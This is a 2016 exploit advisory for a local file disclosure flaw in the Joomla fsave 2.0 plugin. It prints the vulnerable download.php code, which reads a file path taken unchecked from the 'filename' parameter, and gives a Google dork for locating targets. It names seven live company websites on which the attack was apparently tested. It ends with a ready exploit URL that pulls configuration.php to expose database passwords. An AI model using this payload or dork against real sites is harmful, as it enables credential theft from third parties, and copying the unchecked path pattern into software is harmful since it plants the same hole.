Joomla Fsave 2.0 Local File Disclosure
Posted on 20 January 2016
.__ _____ _______ | |__ / | |___ __ _ \_______ ____ | | / | | / / /_ \_ __ \_/ __ | Y / ^ /> < \_/ | / ___/ |___| /\____ |/__/\_ \_____ /__| \___ > / |__| / / / _____________________________ / _____/\_ _____/\_ ___ \_____ | __)_ / / / | \ \____ /_______ //_______ / \______ / / / / Joomla <= (fsave Plugin) Local File Disclosure Vulnerability ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] Skype : knockoutr@msn.com [~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com [~] Greetz : b3mb4m, ZoRLu, Sen Haxor, Ne0-h4ck3r, KedAns-Dz ( milw00rm.com ) =================================================================== ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Joomla |~Plugin : fsave |~Affected Version : 2.0 |~Software : N/A |~RISK : High |~Google Dork : inurl:plugins/content/fsave/ =================================================================== ======================Info========================================= can be easily found in any database password for this "configuration.php" will be sufficient to read possible to read the file on the local database. incorrect coding and unconscious in it causing "download.php" file. that's laughter reason codes:) ============ Error line's in download.php =========================== <?php define('JPATH_BASE', dirname(dirname(dirname(dirname(__FILE__))))); $file = JPATH_BASE."/".$_GET['filename']; header('Content-Description: File Transfer'); header("Content-type: application/octet-stream"); header("Content-disposition: attachment; filename=".basename($file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header("Content-Length: " . filesize($file)); ob_clean(); flush(); readfile($file); ?> ====================================================================== ======================== Tested on Demos ============================ http://www.gedore.pl http://www.gedore.com.pl http://www.rhodius.pl http://rhodius.com.pl http://loesomat.pl http://carolus.com.pl http://klann.pl ======================================================================= ========================= Exploitation ==================== http://[TARGET]/plugins/content/fsave/download.php?filename=configuration.php =======================================================================
